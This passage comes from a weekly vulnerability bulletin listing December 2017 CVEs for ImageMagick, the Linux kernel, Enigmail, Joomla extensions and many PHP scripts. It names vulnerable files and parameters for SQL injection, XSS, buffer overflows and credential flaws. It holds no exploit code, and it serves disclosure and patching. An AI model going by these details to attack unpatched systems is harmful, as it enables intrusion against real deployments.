imagemagick -- imagemagickIn ImageMagick 7.0.7-16 Q16 x86_64 2017-12-21, there is a heap-based buffer over-read in ReadOneMNGImage in coders/png.c, related to length calculation and caused by an off-by-one error.2017-12-276.8CVE-2017-17879
BID
CONFIRM
DEBIAN
imagemagick -- imagemagickIn ImageMagick 7.0.7-16 Q16 x86_64 2017-12-21, there is a stack-based buffer over-read in WriteWEBPImage in coders/webp.c, related to a WEBP_DECODER_ABI_VERSION check.2017-12-276.8CVE-2017-17880
CONFIRM
imagemagick -- imagemagickIn ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadMATImage in coders/mat.c, which allows attackers to cause a denial of service via a crafted MAT image file.2017-12-274.3CVE-2017-17881
CONFIRM
imagemagick -- imagemagickIn ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadXPMImage in coders/xpm.c, which allows attackers to cause a denial of service via a crafted XPM image file.2017-12-274.3CVE-2017-17882
CONFIRM
imagemagick -- imagemagickIn ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadPGXImage in coders/pgx.c, which allows attackers to cause a denial of service via a crafted PGX image file.2017-12-274.3CVE-2017-17883
CONFIRM
imagemagick -- imagemagickIn ImageMagick 7.0.7-16 Q16, a memory leak vulnerability was found in the function WriteOnePNGImage in coders/png.c, which allows attackers to cause a denial of service via a crafted PNG image file.2017-12-274.3CVE-2017-17884
CONFIRM
imagemagick -- imagemagickIn ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadPICTImage in coders/pict.c, which allows attackers to cause a denial of service via a crafted PICT image file.2017-12-274.3CVE-2017-17885
CONFIRM
imagemagick -- imagemagickIn ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadPSDChannelZip in coders/psd.c, which allows attackers to cause a denial of service via a crafted psd image file.2017-12-274.3CVE-2017-17886
CONFIRM
imagemagick -- imagemagickIn ImageMagick 7.0.7-16 Q16, a memory leak vulnerability was found in the function GetImagePixelCache in magick/cache.c, which allows attackers to cause a denial of service via a crafted MNG image file that is processed by ReadOneMNGImage.2017-12-274.3CVE-2017-17887
CONFIRM
imagemagick -- imagemagickImageMagick 7.0.7-17 Q16 x86_64 has memory leaks in coders/msl.c, related to MSLPopImage and ProcessMSLScript, and associated with mishandling of MSLPushImage calls.2017-12-275.0CVE-2017-17934
CONFIRM
Back to top

 

Low Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
There were no low vulnerabilities recorded this week.
Back to top

 

Severity Not Yet Assigned

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
2daybiz.com -- readymade_job_site_script
 		Readymade Job Site Script has SQL Injection via the location_name array parameter to the /job URI.2017-12-27not yet calculatedCVE-2017-17895
MISC
2daybiz.com -- readymade_job_site_script
 		Readymade Job Site Script has CSRF via the /job URI.2017-12-27not yet calculatedCVE-2017-17894
MISC
2daybiz.com -- readymade_job_site_script
 		Readymade Job Site Script has XSS via the keyword parameter to the /job URI.2017-12-27not yet calculatedCVE-2017-17896
MISC
airlive -- multiple_products
 		cgi-bin/mft/wireless_mft.cgi in AirLive BU-2015 with firmware 1.03.18 16.06.2014, AirLive BU-3026 with firmware 1.43 21.08.2014, AirLive MD-3025 with firmware 1.81 21.08.2014, AirLive WL-2000CAM with firmware LM.1.6.18 14.10.2011, and AirLive POE-200CAM v2 with firmware LM.1.6.17.01 uses hard-coded credentials in the embedded Boa web server, which allows remote attackers to obtain user credentials via crafted HTTP requests.2017-12-27not yet calculatedCVE-2014-8389
MISC
FULLDISC
BUGTRAQ
BID
MISC
allmediaserver -- allplayer
 		A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 888.2017-12-28not yet calculatedCVE-2017-17932
EXPLOIT-DB
anti-web -- anti-web
 		cgi-bin/write.cgi in Anti-Web through 3.8.7, as used on NetBiter / HMS, Ouman EH-net, Alliance System WS100 --> AWU 500, Sauter ERW100F001, Carlo Gavazzi SIU-DLG, AEDILIS SMART-1, SYXTHSENSE WebBiter, ABB SREA, and ASCON DY WebServer devices, allows remote authenticated users to execute arbitrary OS commands via crafted multipart/form-data content, a different vulnerability than CVE-2017-9097.2017-12-27not yet calculatedCVE-2017-17888
MISC
MISC
MISC
apache -- flexblaze_ds
 		Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.2017-12-28not yet calculatedCVE-2017-5641
MLIST
BID
SECTRACK
CONFIRM
CERT-VN
archon -- archon
 		packages/core/contact.php in Archon 3.21 rev-1 has XSS in the referer parameter in an index.php?p=core/contact request, aka Open Bug Bounty ID OBB-278503.2017-12-27not yet calculatedCVE-2017-17911
MISC
artifex -- mupdf
 		pdf/pdf-write.c in Artifex MuPDF before 1.12.0 mishandles certain length changes when a repair operation occurs during a clean operation, which allows remote attackers to cause a denial of service (buffer overflow and application crash) or possibly have unspecified other impact via a crafted PDF document.2017-12-27not yet calculatedCVE-2017-17866
CONFIRM
CONFIRM
asterisk -- asterisk
 		An issue was discovered in Asterisk 13.18.4 and older, 14.7.4 and older, 15.1.4 and older, and 13.18-cert1 and older. A select set of SIP messages create a dialog in Asterisk. Those SIP messages must contain a contact header. For those messages, if the header was not present and the PJSIP channel driver was used, Asterisk would crash. The severity of this vulnerability is somewhat mitigated if authentication is enabled. If authentication is enabled, a user would have to first be authorized before reaching the crash point.2017-12-27not yet calculatedCVE-2017-17850
CONFIRM
SECTRACK
CONFIRM
auth0/passport-wsfed-saml2_library -- auth0/passport-wsfed-saml2_library
 		A vulnerability has been discovered in the Auth0 passport-wsfed-saml2 library affecting versions < 3.0.5. This vulnerability allows an attacker to impersonate another user and potentially elevate their privileges if the SAML identity provider does not sign the full SAML response (e.g., only signs the assertion within the response).2017-12-27not yet calculatedCVE-2017-16897
CONFIRM
ba_systems -- bas_web
 		BA SYSTEMS BAS Web on BAS920 devices (with Firmware 01.01.00*, HTTPserv 00002, and Script 02.*) and ISC2000 devices allows remote attackers to obtain sensitive information via a request for isc/get_sid_js.aspx or isc/get_sid.aspx, as demonstrated by obtaining administrative access by subsequently using the credential information for the Supervisor/Administrator account.2017-12-29not yet calculatedCVE-2017-17974
MISC
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 		Biometric Shift Employee Management System has XSS via the Last_Name parameter in an index.php?user=ajax request.2017-12-29not yet calculatedCVE-2017-17995
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 		Biometric Shift Employee Management System has XSS via the amount parameter in an index.php?user=addition_deduction request.2017-12-29not yet calculatedCVE-2017-17993
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 		Biometric Shift Employee Management System has CSRF via index.php in an edit_holiday action.2017-12-29not yet calculatedCVE-2017-17990
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 		Biometric Shift Employee Management System has XSS via the expense_name parameter in an index.php?user=expenses request.2017-12-29not yet calculatedCVE-2017-17991
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 		Biometric Shift Employee Management System has XSS via the index.php holiday_name parameter in an edit_holiday action.2017-12-29not yet calculatedCVE-2017-17989
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 		Biometric Shift Employee Management System allows Arbitrary File Download via directory traversal sequences in the index.php form_file_name parameter in a download_form action.2017-12-29not yet calculatedCVE-2017-17992
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 		Biometric Shift Employee Management System has XSS via the criteria parameter in an index.php?user=competency_criteria request.2017-12-29not yet calculatedCVE-2017-17994
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 		Biometric Shift Employee Management System 3.0 allows remote attackers to bypass intended file-read restrictions via a user=download request with a pathname in the path parameter.2017-12-27not yet calculatedCVE-2017-17876
EXPLOIT-DB
cells -- cells_blog
 		Cells Blog 3.5 has SQL Injection via the pub_readpost.php ptid parameter.2017-12-28not yet calculatedCVE-2017-17950
MISC
cells -- cells_blog
 		Cells Blog 3.5 has XSS via the pub_readpost.php fmid parameter.2017-12-28not yet calculatedCVE-2017-17949
MISC
cells -- cells_blog
 		Cells Blog 3.5 has XSS via the jfdname parameter in an act=showpic request.2017-12-28not yet calculatedCVE-2017-17948
MISC
dolibarr -- erp/crm
 		SQL injection vulnerability in fourn/index.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the socid parameter.2017-12-27not yet calculatedCVE-2017-17900
CONFIRM
dolibarr -- erp/crm
 		Dolibarr ERP/CRM version 6.0.4 does not block direct requests to *.tpl.php files, which allows remote attackers to obtain sensitive information.2017-12-27not yet calculatedCVE-2017-17898
CONFIRM
CONFIRM
dolibarr -- erp/crm
 		SQL injection vulnerability in adherents/subscription/info.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the rowid parameter.2017-12-27not yet calculatedCVE-2017-17899
CONFIRM
dolibarr -- erp/crm
 		SQL injection vulnerability in comm/multiprix.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the id parameter.2017-12-27not yet calculatedCVE-2017-17897
CONFIRM
dolibarr -- erp/crm
 		The test_sql_and_script_inject function in htdocs/main.inc.php in Dolibarr ERP/CRM 6.0.4 blocks some event attributes but neither onclick nor onscroll, which allows XSS.2017-12-29not yet calculatedCVE-2017-17971
MISC
dozer -- dozer
 		Dozer improperly uses a reflection-based approach to type conversion, which might allow remote attackers to execute arbitrary code via a crafted serialized object.2017-12-29not yet calculatedCVE-2014-9515
CONFIRM
MISC
MISC
enigmail -- enigmail 
 		An issue was discovered in Enigmail before 1.9.9. Improper Random Secret Generation occurs because Math.Random() is used by pretty Easy privacy (pEp), aka TBE-01-001.2017-12-27not yet calculatedCVE-2017-17845
MISC
MISC
DEBIAN
MISC
enigmail -- enigmail 
 		An issue was discovered in Enigmail before 1.9.9 that allows remote attackers to trigger use of an intended public key for encryption, because incorrect regular expressions are used for extraction of an e-mail address from a comma-separated list, as demonstrated by a modified Full Name field and a homograph attack, aka TBE-01-002.2017-12-27not yet calculatedCVE-2017-17843
MISC
MISC
DEBIAN
MISC
enigmail -- enigmail 
 		An issue was discovered in Enigmail before 1.9.9. Signature spoofing is possible because the UI does not properly distinguish between an attachment signature, and a signature that applies to the entire containing message, aka TBE-01-021. This is demonstrated by an e-mail message with an attachment that is a signed e-mail message in message/rfc822 format.2017-12-27not yet calculatedCVE-2017-17847
MISC
MISC
MISC
DEBIAN
MISC
enigmail -- enigmail 
 		An issue was discovered in Enigmail before 1.9.9. In a variant of CVE-2017-17847, signature spoofing is possible for multipart/related messages because a signed message part can be referenced with a cid: URI but not actually displayed. In other words, the entire containing message appears to be signed, but the recipient does not see any of the signed text.2017-12-27not yet calculatedCVE-2017-17848
MISC
MISC
DEBIAN
enigmail -- enigmail 
 		An issue was discovered in Enigmail before 1.9.9. Regular expressions are exploitable for Denial of Service, because of attempts to match arbitrarily long strings, aka TBE-01-003.2017-12-27not yet calculatedCVE-2017-17846
MISC
MISC
DEBIAN
MISC
enigmail -- enigmail 
 		An issue was discovered in Enigmail before 1.9.9. A remote attacker can obtain cleartext content by sending an encrypted data block (that the attacker cannot directly decrypt) to a victim, and relying on the victim to automatically decrypt that block and then send it back to the attacker as quoted text, aka the TBE-01-005 "replay" issue.2017-12-27not yet calculatedCVE-2017-17844
MISC
MISC
DEBIAN
MISC
ffmpeg -- ffmpeg
 		The dnxhd decoder in FFmpeg before 3.2.6, and 3.3.x before 3.3.3 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted mov file.2017-12-27not yet calculatedCVE-2017-9608
MLIST
MLIST
BID
CONFIRM
CONFIRM
CONFIRM
DEBIAN
flexsense -- sysguage_server
 		In Flexense SysGauge Server 3.6.18, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9221.2017-12-28not yet calculatedCVE-2017-15667
EXPLOIT-DB
fortunescripts.com -- fs_lynda_clone
 		FS Lynda Clone has CSRF via user/edit_profile, as demonstrated by adding content to the user panel.2017-12-27not yet calculatedCVE-2017-17903
MISC
fortunescripts.com -- fs_lynda_clone
 		FS Lynda Clone has XSS via the keywords parameter to tutorial/ or the edit_profile_first_name parameter to user/edit_profile.2017-12-27not yet calculatedCVE-2017-17904
MISC
getgo_software -- getgo_download_manager
 		A buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long response.2017-12-27not yet calculatedCVE-2017-17849
MISC
EXPLOIT-DB
google -- play
 		XML external entity (XXE) vulnerability in the Java XML processing functionality in Play before 2.2.6 and 2.3.x before 2.3.5 might allow remote attackers to read arbitrary files, cause a denial of service, or have unspecified other impact via crafted XML data.2017-12-29not yet calculatedCVE-2014-3630
CONFIRM
CONFIRM
MISC
CONFIRM
hoermann -- bisecur_devices
 		On Hoermann BiSecur devices before 2018, a vulnerability can be exploited by recording a single radio transmission. An attacker can intercept an arbitrary radio frame exchanged between a BiSecur transmitter and a receiver to obtain the encrypted packet and the 32-bit serial number. The interception of the one-time pairing process is specifically not required. Due to use of AES-128 with an initial static random value and static data vector (all of this static information is the same across different customers' installations), the attacker can easily derive the utilized encryption key and decrypt the intercepted packet. The key can be verified by decrypting the intercepted packet and checking for known plaintext. Subsequently, an attacker can create arbitrary radio frames with the correct encryption key to control BiSecur garage and entrance gate operators and possibly other BiSecur systems as well ("wireless cloning"). To conduct the attack, a low cost Software Defined Radio (SDR) is sufficient. This affects Hoermann Hand Transmitter HS5-868-BS, HSE1-868-BS, and HSE2-868-BS devices.2017-12-29not yet calculatedCVE-2017-17910
MISC
MISC
ibm -- rational_collaborative_lifecycle_managment
 		An undisclosed vulnerability in CLM applications (including IBM Rational Collaborative Lifecycle Management 4.0, 5.0, and 6.0) with potential for failure to restrict URL Access. IBM X-Force ID: 123661.2017-12-27not yet calculatedCVE-2017-1191
CONFIRM
MISC
ibm -- team_concert
 		IBM Team Concert (RTC including IBM Rational Collaborative Lifecycle Management 4.0, 5.0., and 6.0) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-force ID: 126858.2017-12-27not yet calculatedCVE-2017-1365
CONFIRM
MISC
ibm -- websphere_portal
 		IBM WebSphere Portal 7.0, 8.0, 8.5, and 9.0 could reveal sensitive information from an error message that could lead to further attacks against the system. IBM X-Force ID: 124390.2017-12-27not yet calculatedCVE-2017-1698
CONFIRM
BID
SECTRACK
MISC
jboss -- keycloak
 		JBoss KeyCloak before 1.0.3.Final allows remote attackers to cause a denial of service (resource consumption) via a large value in the size parameter to auth/qrcode, related to QR code generation.2017-12-29not yet calculatedCVE-2014-3651
CONFIRM
CONFIRM
joomla! -- joomla!
 		The JEXTN FAQ Pro extension 4.0.0 for Joomla! has SQL Injection via the id parameter in a view=category action.2017-12-27not yet calculatedCVE-2017-17875
EXPLOIT-DB
joomla! -- joomla!
 		The "JEXTN Question And Answer" extension 3.1.0 for Joomla! has SQL Injection via the an parameter in a view=tags action, or the ques-srch parameter.2017-12-27not yet calculatedCVE-2017-17871
EXPLOIT-DB
joomla! -- joomla!
 		The JBuildozer extension 1.4.1 for Joomla! has SQL Injection via the appid parameter in an entriessearch action.2017-12-27not yet calculatedCVE-2017-17870
MISC
EXPLOIT-DB
joomla! -- joomla!
 		Multiple cross-site scripting (XSS) vulnerabilities in helpers/comment.php in the StackIdeas Komento (com_komento) component before 2.0.5 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) img or (2) url tag of a new comment.2017-12-27not yet calculatedCVE-2015-7324
FULLDISC
CONFIRM
MISC
joomla! -- joomla!
 		The JEXTN Video Gallery extension 3.0.5 for Joomla! has SQL Injection via the id parameter in a view=category action.2017-12-27not yet calculatedCVE-2017-17872
EXPLOIT-DB
kingsoft -- wps_office
 		pptreader.dll in Kingsoft WPS Office 10.1.0.6930 allows remote attackers to cause a denial of service via a crafted PPT file, aka CNVD-2017-35482.2017-12-28not yet calculatedCVE-2017-17967
MISC
libtiff -- libtiff
 		In LibTIFF 4.0.9, there is a heap-based buffer over-read in the function PackBitsEncode in tif_packbits.c.2017-12-28not yet calculatedCVE-2017-17942
MISC
BID
libtiff -- libtiff
 		In LibTIFF 4.0.8, there is a heap-based use-after-free in the t2p_writeproc function in tiff2pdf.c.2017-12-29not yet calculatedCVE-2017-17973
MISC
liferay -- liferay_portal
 		In Liferay Portal 6.1.0, the tags section has XSS via a Public Render Parameter (p_r_p) value, as demonstrated by p_r_p_564233524_tag.2017-12-27not yet calculatedCVE-2017-17868
MISC
linux -- linux_kernelkernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect BPF_RSH signed bounds calculations.2017-12-27not yet calculatedCVE-2017-17853
MISC
MISC
MISC
linux -- linux_kernel
 		kernel/bpf/verifier.c in the Linux kernel through 4.14.8 ignores unreachable code, even though it would still be processed by JIT compilers. This behavior, also considered an improper branch-pruning logic issue, could possibly be used by local users for denial of service.2017-12-27not yet calculatedCVE-2017-17862
MISC
SECTRACK
MISC
MISC
DEBIAN
MISC
linux -- linux_kernel
 		kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (integer overflow and memory corruption) or possibly have unspecified other impact by leveraging unrestricted integer values for pointer arithmetic.2017-12-27not yet calculatedCVE-2017-17854
MISC
MISC
MISC
linux -- linux_kernel
 		kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the lack of stack-pointer alignment enforcement.2017-12-27not yet calculatedCVE-2017-17856
MISC
MISC
MISC
linux -- linux_kernel
 		The check_stack_boundary function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of invalid variable stack read operations.2017-12-27not yet calculatedCVE-2017-17857
MISC
MISC
MISC
linux -- linux_kernel
 		kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging improper use of pointers in place of scalars.2017-12-27not yet calculatedCVE-2017-17855
MISC
MISC
MISC
linux -- linux_kernel
 		kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of 32-bit ALU ops.2017-12-27not yet calculatedCVE-2017-17852
MISC
MISC
MISC
linux -- linux_kernel
 		kernel/bpf/verifier.c in the Linux kernel 4.9.x through 4.9.71 does not check the relationship between pointer values and the BPF stack, which allows local users to cause a denial of service (integer overflow or invalid memory access) or possibly have unspecified other impact.2017-12-27not yet calculatedCVE-2017-17863
SECTRACK
MISC
DEBIAN
MISC
linux -- linux_kernel
 		Use-after-free in the usbtv_probe function in drivers/media/usb/usbtv/usbtv-core.c in the Linux kernel through 4.14.10 allows attackers to cause a denial of service (system crash) or possibly have unspecified other impact by triggering failure of audio registration, because a kfree of the usbtv data structure occurs during a usbtv_video_free call, but the usbtv_video_fail label's code attempts to both access and free this data structure.2017-12-29not yet calculatedCVE-2017-17975
MISC
linux -- linux_kernel
 		The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.2017-12-27not yet calculatedCVE-2017-16995
MISC
MISC
BID
MISC
MISC
DEBIAN
linux -- linux_kernel
 		The einj_error_inject function in drivers/acpi/apei/einj.c in the Linux kernel allows local users to simulate hardware errors and consequently cause a denial of service by leveraging failure to disable APEI error injection through EINJ when securelevel is set.2017-12-29not yet calculatedCVE-2016-3695
CONFIRM
CONFIRM
linux -- linux_kernel
 		kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling.2017-12-27not yet calculatedCVE-2017-16996
MISC
MISC
BID
MISC
MISC
linux -- linux_kernel
 		kernel/bpf/verifier.c in the Linux kernel through 4.14.8 mishandles states_equal comparisons between the pointer data type and the UNKNOWN_VALUE data type, which allows local users to obtain potentially sensitive address information, aka a "pointer leak."2017-12-27not yet calculatedCVE-2017-17864
SECTRACK
MISC
MISC
DEBIAN
magento -- magento
 		Magento Community Edition and Enterprise Edition before 2.0.10 and 2.1.x before 2.1.2 have XSS via e-mail templates that are mishandled during a preview, aka APPSEC-1503.2017-12-30not yet calculatedCVE-2016-10704
CONFIRM
mediawiki -- mediawiki
 		The OAuth extension for MediaWiki improperly negotiates a new client token only over Special:OAuth/initiate, which allows attackers to bypass intended IP address access restrictions by making an API request with an existing token.2017-12-29not yet calculatedCVE-2015-8008
FEDORA
FEDORA
FEDORA
MLIST
BID
SECTRACK
CONFIRM
MLIST
CONFIRM
mistune -- mistune
 		Cross-site scripting (XSS) vulnerability in the _keyify function in mistune.py in Mistune before 0.8.1 allows remote attackers to inject arbitrary web script or HTML by leveraging failure to escape the "key" argument.2017-12-29not yet calculatedCVE-2017-16876
CONFIRM
CONFIRM
CONFIRM
FEDORA
mozilla -- network_security_services
 		Heap-based buffer overflow in the __hash_open function in lib/dbm/src/hash.c in Mozilla Network Security Services (NSS) allows context-dependent attackers to have unspecified impact using a crafted cert8.db file.2017-12-27not yet calculatedCVE-2017-11696
MISC
FULLDISC
MISC
BID
SECTRACK
mozilla -- network_security_services
 		Heap-based buffer overflow in the __get_page function in lib/dbm/src/h_page.c in Mozilla Network Security Services (NSS) allows context-dependent attackers to have unspecified impact using a crafted cert8.db file.2017-12-27not yet calculatedCVE-2017-11698
MISC
FULLDISC
MISC
BID
SECTRACK
mozilla -- network_security_services
 		The __hash_open function in hash.c:229 in Mozilla Network Security Services (NSS) allows context-dependent attackers to cause a denial of service (floating point exception and crash) via a crafted cert8.db file.2017-12-27not yet calculatedCVE-2017-11697
MISC
FULLDISC
MISC
BID
SECTRACK
mozilla -- network_security_services
 		Heap-based buffer overflow in the alloc_segs function in lib/dbm/src/hash.c in Mozilla Network Security Services (NSS) allows context-dependent attackers to have unspecified impact using a crafted cert8.db file.2017-12-27not yet calculatedCVE-2017-11695
MISC
FULLDISC
MISC
BID
SECTRACK
mqtt.js -- mqtt.js
 		MQTT.js 2.x.x prior to 2.15.0 issue in handling PUBLISH tickets may lead to an attacker causing a denial-of-service condition.2017-12-27not yet calculatedCVE-2017-10910
MISC
MISC
JVN
nettransport_download_manager -- nettransport_download_manager 
 		A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response.2017-12-29not yet calculatedCVE-2017-17968
EXPLOIT-DB
netwin -- surgeftp
 		cgi/surgeftpmgr.cgi (aka the Web Manager interface on TCP port 7021 or 9021) in NetWin SurgeFTP version 23f2 has XSS via the classid, domainid, or username parameter.2017-12-29not yet calculatedCVE-2017-17933
MISC
open-iscsi -- open-iscsi
 		An issue was discovered in Open-iSCSI through 2.0.875. A local attacker can cause the iscsiuio server to abort or potentially execute code by sending messages with incorrect lengths, which (due to lack of checking) can lead to buffer overflows, and result in aborts (with overflow checking enabled) or code execution. The process_iscsid_broadcast function in iscsiuio/src/unix/iscsid_ipc.c does not validate the payload length before a write operation.2017-12-27not yet calculatedCVE-2017-17840
MISC
MISC
opencv -- opencv
 		OpenCV 3.3.1 has a Buffer Overflow in the cv::PxMDecoder::readData function in grfmt_pxm.cpp, because an incorrect size value is used.2017-12-29not yet calculatedCVE-2017-17760
MISC
MISC
oracle -- jarsigner
 		jarsigner in OpenJDK and Oracle Java SE before 7u51 allows remote attackers to bypass a code-signing protection mechanism and inject unsigned bytecode into a signed JAR file by leveraging improper file validation.2017-12-29not yet calculatedCVE-2013-4578
CONFIRM
MLIST
MLIST
REDHAT
CONFIRM
pdf-xchange_viewer -- pdf-xchange_viewer
 		The launchURL function in PDF-XChange Viewer 2.5 (Build 314.0) might allow remote attackers to execute arbitrary code via a crafted PDF file.2017-12-27not yet calculatedCVE-2017-13056
MISC
phpjabbers -- file_sharing_script
 		PHPJabbers File Sharing Script 1.0 has stored XSS in the comments section.2017-12-30not yet calculatedCVE-2017-12813
MISC
phpjabbers -- night_club_booking_software
 		PHPJabbers Night Club Booking Software has stored XSS in the name parameter in the reservations tab.2017-12-30not yet calculatedCVE-2017-12812
MISC
phpjabbers -- php_newsletter_script
 		PHPJabbers PHP Newsletter Script 4.2 has stored XSS in lists in the admin panel.2017-12-30not yet calculatedCVE-2017-12810
MISC
phpjabbers -- star_rating_script
 		PHPJabbers Star Rating Script 4.0 has stored XSS via a rating item.2017-12-30not yet calculatedCVE-2017-12811
MISC
phpmybackuppro -- phpmybackuppro
 		SQL injection vulnerability in phpMyBackupPro when run in multi-user mode before 2.5 allows remote attackers to execute arbitrary SQL commands via the username and password parameters.2017-12-27not yet calculatedCVE-2015-3637
MLIST
SECTRACK
phpscriptsmall.com -- muslim_matrimonial_scriptPHP Scripts Mall Muslim Matrimonial Script has XSS via the admin/event_edit.php edit_id parameter.2017-12-29not yet calculatedCVE-2017-17984
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 		PHP Scripts Mall Muslim Matrimonial Script has XSS via the admin/state_view.php cou_id parameter.2017-12-29not yet calculatedCVE-2017-17985
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 		PHP Scripts Mall Muslim Matrimonial Script has XSS via the admin/slider_edit.php edit_id parameter.2017-12-29not yet calculatedCVE-2017-17981
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 		PHP Scripts Mall Muslim Matrimonial Script allows arbitrary file upload via admin/mydetails_edit.php.2017-12-29not yet calculatedCVE-2017-17987
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 		PHP Scripts Mall Muslim Matrimonial Script has XSS via the admin/caste_view.php comm_id parameter.2017-12-29not yet calculatedCVE-2017-17986
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 		PHP Scripts Mall Muslim Matrimonial Script has SQL injection via the view-profile.php mem_id parameter.2017-12-29not yet calculatedCVE-2017-17983
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 		PHP Scripts Mall Muslim Matrimonial Script has CSRF via admin/subadmin_edit.php.2017-12-29not yet calculatedCVE-2017-17982
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 		PHP Scripts Mall Muslim Matrimonial Script has XSS via the admin/event_add.php event_title parameter.2017-12-29not yet calculatedCVE-2017-17988
MISC
phpscriptsmall.com -- php_scripts_mall_car_rental_script
 		PHP Scripts Mall Car Rental Script has CSRF via admin/sitesettings.php.2017-12-27not yet calculatedCVE-2017-17905
MISC
phpscriptsmall.com -- php_scripts_mall_car_rental_script
 		PHP Scripts Mall Car Rental Script has XSS via the admin/areaedit.php carid parameter or the admin/sitesettings.php websitename parameter.2017-12-27not yet calculatedCVE-2017-17907
MISC
phpscriptsmall.com -- php_scripts_mall_car_rental_script
 		PHP Scripts Mall Car Rental Script has SQL Injection via the admin/carlistedit.php carid parameter.2017-12-27not yet calculatedCVE-2017-17906
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommercePHP Scripts Mall PHP Multivendor Ecommerce has XSS via the my_wishlist.php fid parameter.2017-12-28not yet calculatedCVE-2017-17958
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommercePHP Scripts Mall PHP Multivendor Ecommerce has a predicable registration URL, which makes it easier for remote attackers to register with an invalid or spoofed e-mail address.2017-12-28not yet calculatedCVE-2017-17952
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommercePHP Scripts Mall PHP Multivendor Ecommerce has XSS via the category.php chid1 parameter.2017-12-28not yet calculatedCVE-2017-17953
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommercePHP Scripts Mall PHP Multivendor Ecommerce has SQL Injection via the my_wishlist.php fid parameter.2017-12-28not yet calculatedCVE-2017-17957
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommerce
 		PHP Scripts Mall PHP Multivendor Ecommerce has CSRF via admin/sellerupd.php.2017-12-28not yet calculatedCVE-2017-17960
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommerce
 		PHP Scripts Mall PHP Multivendor Ecommerce has XSS via the admin/sellerupd.php companyname parameter.2017-12-28not yet calculatedCVE-2017-17956
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommerce
 		PHP Scripts Mall PHP Multivendor Ecommerce has SQL Injection via the seller-view.php usid parameter.2017-12-28not yet calculatedCVE-2017-17959
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommerce
 		PHP Scripts Mall PHP Multivendor Ecommerce has SQL Injection via the shopping-cart.php cusid parameter.2017-12-28not yet calculatedCVE-2017-17951
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommerce
 		PHP Scripts Mall PHP Multivendor Ecommerce has XSS via the shopping-cart.php cusid parameter.2017-12-28not yet calculatedCVE-2017-17955
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommerce
 		PHP Scripts Mall PHP Multivendor Ecommerce has XSS via the seller-view.php usid parameter.2017-12-28not yet calculatedCVE-2017-17954
MISC
phpscriptsmall.com -- php_scripts_mall_professional_services_script
